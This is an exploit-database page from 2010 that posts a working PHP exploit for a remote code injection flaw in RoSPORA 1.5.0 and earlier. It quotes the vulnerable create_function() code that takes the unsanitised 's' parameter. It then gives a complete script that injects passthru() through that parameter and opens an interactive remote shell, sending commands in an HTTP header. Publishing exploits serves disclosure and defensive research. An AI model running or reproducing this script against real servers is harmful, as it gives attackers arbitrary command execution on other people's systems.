[webapps / 0day] - RoSPORA <= 1.5.0 Remote PHP Code Injection
Posted on 28 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>RoSPORA <= 1.5.0 Remote PHP Code Injection | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='RoSPORA <= 1.5.0 Remote PHP Code Injection by EgiX in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>========================================== RoSPORA <= 1.5.0 Remote PHP Code Injection ========================================== <?php /* -------------------------------------------------- RoSPORA <= 1.5.0 Remote PHP Code Injection Exploit -------------------------------------------------- author...: EgiX mail.....: n0b0d13s[at]gmail[dot]com link.....: http://code.google.com/p/rospora/ This PoC was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. [-] vulnerable code in /index.php 667. if (!$sort = &$_GET['s']) $sort=0; 668. if (!$flag = &$_GET['f']) $flag=0; 669. if ($flag==0) { $flag=1; $sort_type='<'; } 670. else { $flag=0; $sort_type='>'; } 671. $link=$_SERVER['PHP_SELF']."?f=".$flag."&s="; 672. 673. if (!empty($pl_array)) 674. { 675. 
usort($pl_array, create_function('$a, $b', 'if ( $a['.$sort.'] == $b['.$sort.'] ) return 0; if ( $a['.$sort.'] '.$sort_type.' $b['.$sort.'] ) return -1; return 1;')); 676. } Input parameter passed through $_GET['s'] isn't properly sanitised before being used in a call to "create_function()" at line 675. This can be exploited to inject and execute arbitrary PHP code. */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die(" [-] No response from {$host}:80 "); fputs($sock, $packet); return stream_get_contents($sock); } print " +------------------------------------------------------------+"; print " | RoSPORA <= 1.5.0 Remote PHP Code Injection Exploit by EgiX |"; print " +------------------------------------------------------------+ "; if ($argc < 3) { print " Usage......: php $argv[0] host path "; print " Example....: php $argv[0] localhost /"; print " Example....: php $argv[0] localhost /rospora/ "; die(); } $host = $argv[1]; $path = $argv[2]; $code = "0]);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%%23"; $packet = "GET {$path}?s={$code} HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Cmd: %s "; $packet .= "Connection: close "; while(1) { print " rospora-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die(" [-] Exploit failed... "); } ?> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-28]</pre></body></html>